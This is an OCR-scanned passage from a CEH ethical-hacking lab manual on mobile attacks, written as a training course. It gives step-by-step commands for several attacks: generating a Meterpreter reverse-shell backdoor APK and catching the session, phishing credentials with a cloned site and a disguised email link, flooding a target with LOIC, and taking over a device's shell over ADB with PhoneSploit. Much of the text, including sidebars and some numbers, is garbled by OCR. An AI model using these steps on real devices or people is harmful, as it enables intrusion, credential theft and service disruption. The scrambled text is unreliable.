CEH Lab Manual (CoH Lab Manual Page 1560 Hacking Mobile Platforms Module 17 "Al RightsReserved, Reproducton fs Stcty Prose.on kK © Vatuable A Test your nowledgs Bi Weberercive DD Workbook review & Teots demonstrated in this lab are available in EACEH- ToolsiCEHvt1 Module 17 Hacking Mobile Platforms (CoH Lab Manual Page 1562 Module 17 - Hacking Mobile Platforms Hacking Mobile Platforms Mobile devices allow commennication between users on radio frequencies, whether GSM, LIE, 5G, or Wi-Fi, They aan be used to send ronltimedia content, email, an perform sntany more tasks using the Internet Lab Scenario With the advancement of mobile technology, mobility has become a key feature of Internet usage. People’s lifestyles are becoming increasingly reliant on smartphones and tablets. Mobile devices are replacing desktops and laptops, as they enable users £0 access email, the Intemet, and GPS navigation, and to store critical data such as contact lists, passwords, calendars, and login credentials. In addition, recent developments in mobile commerce have enabled users 0 perform transactions on their smartphones such as purchasing goods and applications over wireless networks, redeeming coupons and tickets, and banking. Most mobile devices come with options to send and receive text or email messages, as well as download applications via the Internet. Although these functions are technological advances, hackers continue to use them for malicious purposes. For example, they may send malformed APKs (application package files) o URLs to individuals to entice victims to click on or even install them, and So grant the attackers access (© users? login credentials, or whole or partial control of their devices. Mobile security is becoming more challenging with the emergence of complex attacks that utilize multiple attack vectors to compromise mobile devices. These security threats can lead to critical data, money, and other information being stolen from mobile users and may also damage the reputation of mobile networks and organizations. ‘The belief that surfing the Internet on mobile devices is safe causes many users to not enable their devices’ security software. The popularity ‘of smartphones and their moderately lax security have made them attractive and more valuable targets to attackers. As an expert ethical hacker or penetration tester, you should first test the mobile platform used by your organization for various vulnerabilities; then, using this information, you should secure it from possible attacks. In this lab, you will obtain hands-on experience with various techniques of launching attacks on mobile platforms, which will help you to audit their security. Lab Objectives ‘The objective of the lab is to carry out mobile platform hacking and other tasks that include, but are not limited to: + Exploit the vulnerabilit © Obtain users’ credentials s in an Android device © Hack Android device with a malicious application Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.(CoH Lab Manual Page 1562 Module 17 - Hacking Mobile Platforms * Use an Android device to launch a DoS attack on a target + Exploitan Android device through ADB "Perform a sccurity assessment on an Android device Lab Environment ‘To carry out this la, you need: © Windows 10 vietual machine Parrot Security virtual machine # Android emulator sunning ona virtual machine # Web browsers with an Intemet connection * Administrator privileges to run the tools Lab Duration Time: 90 Minutes Overview of Hacking Mobile Platforms At present, smartphones are widely used for both business and personal purposes. Thus, they are a treasure trove for attackers looking to steal corporate or personal ata, Security threats to mobile devices have increased with the growth of Internet connectivity, use of business and other applications, various methods of communication available, etc. Apart from certain security threats that are specific to them, mobile devices are also susceptible to many other threats that are applicable to desktop and laptop computers, web applications, and networks. Nowadays, smartphones offer broad Internet and network co wring channels such as 3G/4G/3G, Bluetooth, Wir, or wired computer connections. Security threats may arise while transmitting data at different points along these inectivity via various paths. Lab Tasks Ethical hackers or penetration testers use numerous tools and techniques to attack target mobile devices. ‘The recommended labs that will assist you in learning various mobile attack techniques include: 1 | Hack Andeoid Devices v v 1.1 Hack an Android Device by Creating j Binary Payloads using Parrot Security 1.2 Harvest Users? Credentials using the ‘ Social-Engineer Toolkit Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 13. Launch a DoS Attack on a Target Machine using Low Orbital Cannc y (LOIO) on the Andeoid Mobile Platform 14 Exploit the Android Platform through | q ADB using PhoneSploit Secure Android Devices using Various / 2 | Android Security Tools y a ‘ 21 Analyze a Malicous App using Online | v Android Analyzers 22. Analyze a Malicious App using Quixxi y Vulnerabiley Seance 23. Secure Android Devices from , Malicious Apps using, Malwarebytes y Scevsity Remark EC. Council has prepared considered amount of lb exercises fe student w practice dung the 5 day class snd atti free time to enhance thee knowledge and sil. ‘sCore - Lab excise(?) thud under Core ate secomamended by EC-Council wo be practised dung the Seday clase ‘s8Selfatudy - Lah excises) marked under nlf. is For stalents to practine thee foe time. Stop 0 access che addtional ab exercies can be found in the Best page of CEHv11 volume 1 book. ‘S88iLabby - Lab exerise(s) marked under Labs ae available in our Las solution, Labs iy 2 clnal-based ‘rca ib excironment preconfigured sith vulnerabties expt ole and script, al eam be aecexaed faom anywhere with an Inemet connection. Ifyou are intezsted 9 arn moze about our Labs solution, please contact your taining center or vist hups//lkbs.eecounciLory. Lab Analysis Analyze and document the results related to the lab exercise. Give your opinion on your target's secusity posture and exposure. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB (CoH Lab Manat Page 1563 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.oN KEY © Vateate Jformation AF Tes: Your Kaowiedge Bi Web fixercise 1D Workbook Review (CoH Lab Manat Page 1564 Module 17 - Hacking Mobile Platforms Hack Android Devices Attackers use various Andruid hacking tools to identify rulnerabiliies and exploit target mobile devices in order to obtain critical user information such as eredentials ‘persanal information, cantact lists, ete. Lab Scenario ‘The number of people using smartphones and tablets is on the rise, as these devices support a wide range of functionalities. Android is the most popular mobile OS, because it is a platform open to all applications. Like other OSes, Android has its vulnerabilities, and not all Android users install patches to keep OS software and apps up to date and secure. This casualness enables attackers to exploit vulnerabilities and launch various types of attacks to steal valuable data stored on the vietims’ devices ‘Owing to the extensive usage and implementation of bring your own device (BYOD) policies in organizations, mobile devices have become a prime target for attacks. Attackers scan these devices for vulnerabilities. These attacks can involve the device and the network layes, the data center, or a combination of these. Asa professional ethical hacker or pen tester, you should be familiar with all the hacking tools, exploits, and payloads to perform various tests mobile devices connected to a network to assess its security infrastructure. In this lab, we will use various tools and techniques to hack the target mobile device, Lab Objectives "Hack an Android device by creating binary payloads using, Parrot Security © Harvest users’ cecdentials using the Social-Fngineer Toolkit © Launch a DoS attack on a target machine using Low Orbital Cannon (LOIG on the Android mobile platform ‘+ Exploit the Android platform throngh ADB using PhoneSploit Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.‘demonstrated in this lab are available in CEH. ‘Toolsi\CEHVt4 Module 17 Hacking Mobile Platforms im TASK 4 1 Anachss use vasioas tools suchas Meteo to ‘crete binary polos, which are sent the feet ate to an ‘conte overt The Metmplois Femework is a Ruby based, modular ‘Pencaton eine Paton that nabs yuo to ure testandexeete ‘exploit code (CoH Lab Manual Page 1565 Module 17 - Hacking Mobile Platforms ‘out this lab, you need: © Windows 10 virtual machine © Parrot Security virtual machine * Android emulator running on a virtual machine Web browsers with an Intemet connection = Adm steator privileges to run the tools © LOIC located at EACEH-ToolsiCEHv14 Module 17 Hacking Mobile Platforms\Android Hacking ToolsiLow Orbit lon Cannon (LOIC) * You can also download the latest version of LOIC from its offical website. IF you do so, the screenshots in this ab manual might differ from the images that you see on your screen in the lab. Lab Duration ‘Time: 60 Minutes Overview of Hacking Android Platforms Android is a software cavironment developed by Google for mobile devices. It includes an OS, a middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java AP Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer [ILAL], and Linux kesnel) and five layers. ‘Owing to the increase in the number of users with Android devices, they have become the primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spear phone attacks. Lab Tasks Hack an Android Device by Creating Binary Payloads using Parrot Security In this task, we will use Metasploit to create a binary payload in Parrot Security to hack an Android device. 1. ‘Tum on the Parrot Security anc Android virtual machines. Note: You need to navigate to the Android virtual machine regularly as it freezes if left idle. 2. Switch to the Parrot Security virtual machine. In the login page, the attacker username will he selected by default. Eater password as toer in the Password field and press Enter to log. in to the machine. Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms attacker Note: sali Ifa Parrot Updater pop-up appears at the top-right corner of sor consi Desktop, ignore and close it. © If a Question pop-up window appears asking you to update the machine, click Ne to close the window ‘ulneabiics, coumes ted evade detect. MCT iad 3. Click the MATE Terminal icon (Mia) at the top of the Desktop window that provides an to open a Terminal window eta dal harm Srecinopieg: 4. A Parrot Terminal window appears In the terminal window, rype sud su rein eo eal pea Rnler ts fon the pecama ra sok ose 5. In the [sudo] password for attacker ficld, ype toor as a password and press Mater. “The password that you type will not be visible 6. Now, type ed and press Enter to jump to the root directory In the Parrot Terminal window, type service postgresql start and press Enter to stat the database service cash ama Popes teal tains coutarmatsure opie ©by Ba ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 8. ‘Type msfvenom -p androidimeterpreterireverse tcp platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk and press Enter to gencsate a backdoor, or reverse meteepecter application. B task Backdoor APK ‘Note: This command creates an APK (Backdoor.apk) on Desktop under the Root directory. In this case, 10.40,10.13 is the IP ackdress of the Parrot Security virtual machine. This IP address may iffcr in your lab cnvisonment. igure 1.14: Sting the Andi pytad and ering a backoor Task nu? 9. Now, share or send the Backdoor.apk file to the victim machine (in this lab, we are using the Android cmulator as the victim machine), Share Backdoor.apk Note: In this task, we are sending the malicious payload through a shared File directory, but in real-life cases, attackers may send it via an attachment in an email, over Bluetooth, or through some other application or means, 10. Type ep frootDesktopiBacktoor.apk Wvariwwwhhtmitshare! ancl press Enter to copy the file to the share folder. Note: If the shared folder is not present, navigate to varwwwihtml and create a folder named share. 11. Now, type service apache? start and press Enter to start the Apache web server. 1.1.5: Copyig he aekdon le to share fle GS yaew ne 12. ‘Type msfeonsole and press Enter to launch the Metasploit framework Set the Payload 13, In msfconsole, type use exploit/multihandier and press Enter. CEH Lab Manual Page 1567 Ethical Hacking and Countermeasures Copyigh © by EE-Counell ‘Al RightsReserved. Reproduction Sve Profits.Module 17- Hacking Mobi igre 1.1.6 ing the nha expt 14, Now, issue the following commands in msfconsole * Type set payload androidimeterpreterireverse tep and press Enter. = ‘Type set LHOST 40.10.10.13 and press Enter. Type show options and press Enter. This command lets you know the listening port (in this case, 4444), as shown in the screenshot ign 1.17: Seting payload and oa hos (eH Lab Manual Page 1568 Ethical Making and Countermeasures Copy ‘A Rights Reserved. Reproductions by EE-Counel icy Prone.Module 17 - Hacking Mobile Platforms 15, ‘Type exploit J -z and press Enter. This command runs the exploit as a background job. gure 1.8 Searing the capo 16. Switch to the Andrald eavulator virtual machine. 17. In the Android Emulator GUI, click the Chrame icon on the lower section of the Home Sereen to launch the browser. 18, In the address bar, type hittp2/110.10.10.13/shar and press Enter. —BtasK 1.4 Note: Ifa pop up appears, click Allow. Download and Launch theape —12- The Index of /share eacceane application package file. Note: If a warning message appears at the lower section of the browser window, click OK. ze appears; click Backdoor.apk to download the Note: If Chrome needs storage access to download files, a pop-up will appear; click Continue, If any pop-up appears stating that the fle contains a virus, ignore the message and download the file anyway. 0 ¢ > ¢ [mou carer) Index of /share 2 rae Discwry (CoH Lab Manat Page 1569 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 20. After the download finish tion appears at the bottom of the browser window. Click @pen to open the application. ss, a not ge 1.1.1: Open the downlcaded Baekdoorapk 21. A Maindetivity scrcen appears; click Next, and then Install 2 Mainactivity @ were os 2 re mest rite contact rset ge 1.1.12 Maint sereon locked by Play Protect pop-up appears; click INSTALL ANYWAY. Blocked by Play Protect EE verses ect doesnit recognize this app’s developer. Apps from unkno INSTALL ANYWAY Figur 1.15 Blache by lay Pet pop ap Ethical Macking and Countermeasures Copyright © by E-Soumell (CoH Lab Manual Page 1570 ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 23. A Send app for scanning? pop-up appears; Send app for scanning? Figs 1.1.14: Send ap for ecannn 24. After the application installs successfully, an App installed notification appears; click OPEN. EX Mainactivity Appinstalled Figure 11.18 App intl sien B yaen as 25. Switch back to the Parrot Security virtual machine. The meterpreter session has been opened successfully, as shown in the screenshot. Perform Post Exploitation Note: In this case, 1040.10.44 is the IP address of the vietim machine (Android Emulator). The IP addresses may vary in your lab envionment. Fue 11.16 Meteptee Sesion Lanta (cen tab Manual Page 187 Ethical Hacking and Countermeasures Copyigh © by EE-Counell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms ‘Type sessions -i 4 nd press Enter. The Meterpreter shell is launched as shown in the screenshot. Note: In this command, 4 specifies the number of the session. 26. ‘Type sysinfo and press Enter. Issuing this command displays. the information the target machine such as computer name, OS, etc. 27. Type ipconfig and press Enter to display the victim machine’s network interfaces, IP address (IPv4 and IPv6), MAC address, etc. as shown in the sceeenshot. 28. Type pwd and press Enter to view the current or present working cctory on the remote (target) machine. eH Lab Manual Page 572 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 29. ‘Type ed Isdeard to change the current remote directory to sdeard, Note: ‘The ed command changes the current remote directory. 30. Now, type pwd and press Enter. You will observe that the present working directory has changed to sdeard, chat is, Istorage/emulated0, Figure 11.2 Ching the PWD to alan 31. Now, still ia the Metespreter session, type ps and press Enter to view the in the target system. Note: The list of running processes might differ in your lab enviconm Note: Because of poor security settings and a lack of awareness, if an individual in an oxganization installs a backdoor file on their device, the attacker gains control of the device. ‘The attacker can then perform malicious activities such as uploading worms, downloading data, and spying on the user’s keystrokes, which can reveal sensitive information related to the organization as well as the victim. 32. This concludes the demonstration of how to hack an Android device by creating binary payloads using Parrot Security 33. Close all open windows and document all the acquired information. 34. ‘Tum off the Parrot Seeurity and Android virtual machines. (eH Lab Manual Page 573 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms Harvest Users’ Credentials using the Social-Engineer Toolki TASK 2 k, we will su if Facebook credentials on the Android platform using B vane acs 1. Turn on the Parrot Security and Android victual machines, Launch SET 2. Log ia to the Parrot Seeurity virtual machine. 3. Click Applications in the top-left commer of Desktop and navigate to Pentesting -> Exploitation Tools -> Social Engineering -> social engineering toolkit. The Socbl eginece Toollit SEN isan open 4. A Terminal window appears, in the [sudo] password for attacker ficld, sores, Python ven type toor and press Enter. tool that eras Pemex testing via lote: The password that you type will not be visible snare ep ‘Type y and press Enter to agzee to the tcems of services aon at ins 6. The SET meau appears, as shown in the seecenshot. Type 4 and press Enter (0 choose Social-Engineering Attacks. (eH Lab Manual Page 574 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms = A list of options for Secta-Engineering Attacks appears; (ype 2 and sacks according tthe press Enter to choose Website Attack Vectors. amc vectored ick ipo ach ene web Or USB, The ori aracks human weakness, esploing people's tr, fear, wanes olin © Bone names fof tacks an be tenched ning SET, 2308 A list of Website Attack Vector options appears; type 3 and press Enter to choose Credential Harvester Attack Method apportd heal bythe (eH Lab Manual Page 575, Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 9, Now, we need fo create a clone of the Facebook login page. ‘Type 2 and SB orasw 2.20 press Enter to choose Site Cloner from the menu. Create a Cloned Website 10. Type the IP address of the local machine (Parrot Security) in the prompt for “IP address for the POST back in Harvester/Tabnabbing” and press Enter. Note: ‘The IP address of Parrot Security in this casc is 10.10.40.13, but this may vary in your lab environment 11. Now, you will be prompted for a URL to be cloned; type the desired URL in “Enter the url to clone” and press Enter. In this example, we are cloning the URI httpu/certifiedhacker.com/Online%20Booking/index.htm. Note: You can clone any URL of your choice. Figure 1.25: Providing the URL tw be domed 12, If a Press {return} if you understand what we're saying here messaze appears, press Enter. Note: If a message appears asking De you want to attempt to di Apache?, type y and press Enter. CEH tab Manual Page 575 Ethical Hacking and Countermeasures Copy © by EE Commel ‘A Rights Reserved. Reproductions icy Prone.Module 17 - Hacking Mobile Platforms 13, After cloning is completed, the highlighted message appears and he ential harvester initiates, as shown in the screenshot 14, Now, you must send the IP address of your Parrot Seeurity virtual Ei ras« 2.3 ee machine to a victim and trick them to click on it. Minimize the Terminal Send a Crafted window Email 15, Remaining on your Parrot Seeurity virtual machine, click on the Firefox icon (EBM) in the top section of Desktop to launch the Firefox web browser. 16. In the Firefox browser window, open your email account (in this example, Gmail) and log in. Note: You can use any email account of your choice 17. After logging into your email account, click the Compose button and craft a fake email that will lure a user into opening, and clicking on a malicious link Note: We will disguise the malicious link behind a fake link that looks safe to click, 18. Having written an enticing message in the body of the email, move the cursor to where you wish to place the malicious link. Then, click the Insert link icon (© (eH Lab Manual Page 577 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms Fre 127 Linking ike URE the micas URL 19, In the Edit Link window, first type the actual address of your cloned site in the Web address field under the Link to section in the Web address. field, type the actual (malicious) IP address. Then, type the fake URI. in the Text to display ficld. In this case, the actual address of our cloned certifedhacker site is http:!'40.40.40.13, and the text that will be displayed in the message is httpu/www.bookhotel.comichange account password: click OK. Edit Link x ext display | tpn boakhotelcom/change_eecount_ password Lect emalladdcess Testi ink igs 1.20 ait Link window 20. The fake URL should now appear in the message body, as shown in the screenshot. (CoH Lab Manat Page 1578 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 21. To verify that the fake URI. is linked to the real one, click the fake URLs it will display the actual URL as “Go to link.” Once verified, send the email to the intended user. Jo sro uenvovQ + igus 120: Aetal URL kd fe URL 22. Switch to the Android virtual machine. Open the Phishing Note: Restart the Android virwnal machine if itis not responding Email and Log in tome Cloned . cost 200 MMM on she tome screen to (ach ee cen 23. Geka meee he Homi to launch 24. In the Google Chrome browser window, sign in to the account to which you sent the phishing mail as an attacker. Open the email you seat previously and click to open the malicious link. Note: We are opening the phishing mail as a victim. (CoH Lab Manat Page 1579 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms SECURE YOUR ONLINE HO} a > te 1.2.08 The phishing ral 25. When the victim (in this case, you) clicks the URL, a new tab opens up, and a ceplica of www.certifiedhacker.com loads. 26. The hotel booking page appears, scroll-down to the end of the page. Here, the victim will be prompted to enter his/her username and password into the form fields, which appear as they do on the genuine website. When the victim enters the Username and Password and clicks Login, the page shows an error, as shown in the second screenshot. 1-800-123 —— Bhs) eel Figs 1.211: Fike Online Booking login page (CoH Lab Manual Page 1560 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms TT a This 10:10.10.13 page carte found ee | SB task 2 27. As soon as the victim types in their Username and Password and clicks Obtain the Log In, SET, which is running in Parrot Security, fetches the typed Credentials credentials, which can then be used by the attacker to guin unauthorized access to the vietim’s account. 28. Switch to the Parrot Security vistual machine. In the terminal window, scroll down fo find a Username and Password, displayed in plain text, as shown in the screenshot. concludes the demonstration of how to phish user credentials using 30. Close all open windows and document all the acquired information. 31. Turn off the Parrot Security and Android virtual machines, Launch a DoS Attack on a Target Machine using Low Orbital TASK 3 Cannon (LOIC) on the Android Mobile Platform In this task, we will use LOIC on the Android mobile platform to launch a DoS. attack on a target machine. 1. Tum on the Windows 10, Windows Server 2019, and Android virtual machines. (eH Lab Manual Pope 581 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 2. Switch to the Android virtual machine. On the Home sereen, swipe from ‘ight to left to navigate to the second page of the Home sereen. Note: Restart the Android virtual machine if itis not responding, pac 3 Sipe the end pipe of he Home seen Sige 3. On the sccond page of the Home sereen, click the Gx File Explorer app. pen souce newer Stes testing nd Den tS (D8) tock Splat LOIC Peters «DoS ack ‘then ned Ey mine inddnk » DD ach ons at ie By Ahn the server wth UCPer UDP paces ‘wih heintenton of Beping te nice of peat Pepe fave wed LOIC win ohne bomen, Fyre 132: Lach Gc Fc plorer (CoH Lab Manual Page 1562 Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 4. Gx File Explorer opens; click 10.40.40.10 from the Network tab and Bras sis) navigate to CEH-Tools > CEHv14 Module 17 Hacking Mobile Platforms Download and > Android Hacking Tools > Low Orbit lon Cannon (LOIC). Install LOIG eer Access from PC | 10.10.10.10 Fg 133.6 ile Exper 5. Click the Low Orbit lon Gannon LOIC v1.3.apk file. Sonora I SE a> OTT Me 7 ac Ge Pars An ning Yous > oy en Caren FPF Lo oer camantoevt ack 3 gt 134 Op he LONE APKC (CoH Lab Manual Page 1563 Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mabie Platforms 6. A Do you want to install this application? screen appears, click INSTALL, HE Low obit on Cannon oyouwantto mest the anpeaten ooce not requ any pod access. Figur 1.85: Clk Install 7. ‘The installation begins; on completion, an App installed notification appears; click OPEN to launch the app. Low Orbit on Cannon ‘sop sats. Figure 136 Lancing LOI (CeH Lab Manat Page 1568 Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 8. On the LOIC sereen, we will seta target website or machine. In this task, we shall launch a DoS attack on Windows Server 2019 (10.40.10.49) machine GB rasK 3.2 9. In the left pane, in the URL. field, type 10.10.10.19 and click the GET IP Target Machine ene: 10. The IP address of the target machine is displayed under the Manual IP option, as shown in the sercenshot. 11. ‘To launch the attack, first select the TEP radio button; in the right pane, fer 80 as the Port number and in the Threads ficld, enter 100. Thea, ‘k the Start button, as shown in the screenshot. 12. LOIC begins to flood th will see by running Wire rget machine with ‘TCP packets, which we (eH Lab Manual Page 585, Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 13. Switch to the Windows Server 2049 virtual machine and log in with the Brace 3.3 credentials Administrator/PaSSwOrd. ‘Analyze the 14, Click the Type here to search ficld at the bottom of Desktop and type ‘Target Machine wireshark. Then, click Wireshark from the results. Note: If Wireshark is sot installed in the Windows Server 2049 virtual machine, then navigate to the location ZACEHW11 Module 03 Scanning Notworks\Banner Grabbing Tools\Wireshark and double-click Wireshark: ‘win64-3.0.5.exe file and install Wireshark using default settings. 15. The Wireshark Network Analyzer opens; double-click: on the primary network interface (in this casc, Ethemet®) to start capturing network traffic. ‘Note: The network interface might differ in your Iab environment TAL The Wirechare atwon Arar Fle Eat View Go Capture Anahae Statistics Telephony Wireless Tools Help BC@EURRE Ge Tae Lec! Are Comectin’ 9 Local Ares Connection" 7 Nocap Loopback Adapter SS fecha 5 gure 1.9: Coping newark tf hugs Wier 16, Wireshark starts capturing network packers. Note the huge number of packets coming from the attackers’ machine (in this case, Android, which has the IP address 40,40,10.14), as shown in the screenshot, 17. The packets from 10,10.40.14 are sent to the target machine (Windows Server 2019), whose IP address is 10.10.10.18. (CoH Lab Manual Page 1585 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.(CoH Lab Manual Page 1567 Module 17 - Hacking Mobile Platforms rie tae ar So Ce kote Sis ‘phony a Tw Hp BRO terest eur azsse8 x eseee-ts sa sent = 68 (Fn, aot far an. nssoe iasa0 19 aes 99 rn act ee cee cree tener * es = sme (sm, ace 5 1 Saco 0 (ar) seers > Frame 6 9 ayes on are (02 bts), 74 byes cote (502 88s) on Aerace Clhereet 2, Sect wre cise (0st aig aieO), Dts Ve es fan (O08 56cm) igure 13.10; Wireshak display ewok ric 18, Now, click the Stop eapturing packets icon (ll) in the cotbar to stop the process. 19, Observe the huge number of packets sent in the Packets field at the bottom of the Wireshark window, as shown in screenshot. for seas «we (ron Aen) eo fer Games son rn 2) tee Govan on ure] seed ret ane vs foe] seat 28 (xe set ae rosea vas [acl Sort faces re Se a sass fa] Seat Seno 3526 [5m 80) eo ease 60 (En) ene ror saponin san fry an) a ran 174 bes on wire (52 Bit), 7 bytes captured (55 Bite) on interface 0 [therm HE Set yen aah Otc ic: Dat), Dats Yume Fen (58:5:e: 48) igure 1.1: Stop packer epee Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.E TASK 4 © Andoid Debug Bridge ADB) isa verae commend lie toc hat lets yom communicate with sdevice ADI cbvice actions such inal and debugging ‘psa provides acces tors Unix he that yo dhevice 7 Usual deco necro ADI 04 Arua devices by wing a USI able bait is abo posiblet doo winkealy by caliinge Iaemon seme at TCP cn the device (eH Lab Manual Page 1588 Module 17 - Hacking Mobile Platforms 20. Now switch back to the Andreid virtual machine and halt the DoS attack by clicking the STOP button. 21. ‘This concludes the demonstration of how to use LOIC on Android to launch a DoS arrack on a target machine 22. Close all open windows and document all the acquired information. 23. Turn off the Windows 10, Windows Server 2019, and Android virtual machines. Exploit the Android Platform through ADB using PhoneSploit Tn this task, we will exploit the 2 tool indroid platform through ADB using the PhoneSploit Note: We will target the Android virtual machine (10.40.40.14) using the Parrot Security virtual machine 1. ‘Turn on the Parrot Security and Android virtual machines. 2. In the login page, the attacker usemame will be selected by default. Enter password as toor in the Password ficld and press Enter to log in to the machine. Note: If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it Ifa Question pop-up window appears asking you to update the machine, click Ne to close the window 5. Click the mare Temina icon Eh 0 open a Parrot Terminal window wt the top of the Desktop window 4. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter (0 run the programs as a root user. Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 5. In the fsudo] password for attacker fick, (ype tor as a password and press Enter. Note: The password that you type will not be visible. 6. Now, type ed and press Enter to jump to the root directory In the Terminal window, type apt-get install adb and press Enter to install ADB. 8. Ifa Do you want to continue? message appears during the installation, type ¥ and press Enter to continue 9. Once the installation completes, type git clone https:!/github.com/01010000-kumar/PhoneSploit and press Enter to Clone PhoneSploit clone the PhoneSploit repository. Repository Girask 4.4 eer Phionesploit St pas Test emo tal Note: You can also access the tool repository fom the CEH-Teols folder available in Windows 10 virtual machine, in casc, the Git! Iub link does not exist, or you are unable to clone the tool repository. Follow the steps below in order to access CBH-Tools folder from the Parrot Security virtual machine: eH Lab Manual Page 1569 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms * Open a windows explorer and press Gtet#L. The Location ficld appears; type smbz/40,10.10.10 and press Enter to access Windows 10 shared folders "The security pop-up appears; enter the Windows 10 virtual machine credentials (Usemame: Admin and Password: PaS$wOrd) and click Connect. * The Windows shares on 10.10.10.10 window appears; navigate to the location CEH-ToolsiCEHv11 Module 17 Hacking Mobile PlatformsiGitHub Tools! and copy the PheneSploit folder = Paste the copied PhoneSplolt folder on the location homelattacker! * In the terminal window, type my homelattacker/PhoneSploit /root!. 10. Now, type ed PhoneSploit and press Enter to navigate to the PhoneSploit folder. Note: By defaulr, the too! will be cloned in the root directory 11. Type phyton3 -m pip install colorama and press Enter to install the dependency 12, Now, type python3 phonesploit.py and press Enter io run the tool Fe 14 Rang Phone (eH Lab Manual Page 1590 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 13, ‘The PhoneSploit main menu options appear, as shown in the screenshot 14, ‘The main menu prompt appears; type 3 and press Enter to choose Connect Eras 4.2 = a new phone. Specify and Exploit the Target 15. When prompted to Enter a phones ip address, type the target Android Android Device device's IP address (in this ease, 1010.40.14) and press Enter. 16. You will sce that the target Android device (in this case, 1040.10.14) is connected through port number 5885 Note: If you are unable to establish a connection with the target device, then perform Steps#12-15 aga Figur Af Cone dev 17. Now, at the main_menu prompi, type 4 and press Enter (o choose Access Shell on a phone. 18. When prompted to Enter a device name, type the target Android device’s IP address (n this case, 10.40.40.44) and press Enter. 19. You can obsceve that a shell command line appears, as shown in the sercenshot CEH tab Manual Page 59 Ethical Hacking and Countermeasures Copyigh © by EE-Counell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms Figs 147: Shull aes on phone 20. In the shell command lin , type pwd and press Enter to view the present working directory on the target Android device 21. In the results, you can observe that the PWD is the root directory 22. Now, type ts and press Enter to view all the files present in the root directory A pl 5 oon ot eer See Ce aaa nit usb. configfs.r Stas acer] eararies Type ed sdeard and press Enter to navigate to the sdeard folder. 24, Type ts and press Enter to lst all the available files and folders, Note: In this example, we will download an image file (images.jpeg) that we placed in the Android virtual machine’s Download folder easier; you can do the same before performing the next steps. (eH Lab Manual Pope 592 Ethical Making and Countermeasures Copy ‘A Rights Reserved. Reproductions by EE-Counel icy Prone.Module 17 - Hacking Mobile Platforms 25. ‘Type ed Download and press Enter to navigate to the Download folder. 26. ‘Type Is and press Enter to list all the available files in the folder. In this ease we are interested in the images.jpeg file, which we downloaded catlcr. Note: Note down the location of images,jpeg (jn this example, Isdeard/Downloadiimages jpeg). \\/c will download this fie in later steps. sdcard/Download_$ [Ls| sn the Down dc 27. Type enit and press Enter to exit the shell command line and return to the 28. Acthe main_menu prompr, ype 7 and press Enter to choose Sereen Shot a picture on a phone. 29, When prompted to Enter a device name, ‘ype the target Android device's IP address Ga this case, 10:40.40-44) and press Enter. 30. When prompicd to Enter where you would like the screenshot to be saved, (ype Mhomelattacker/Desktop! 1s the location and press Enter. The mobile device will be saved in the given location. screenshot of the tar Minimize the Terminal window 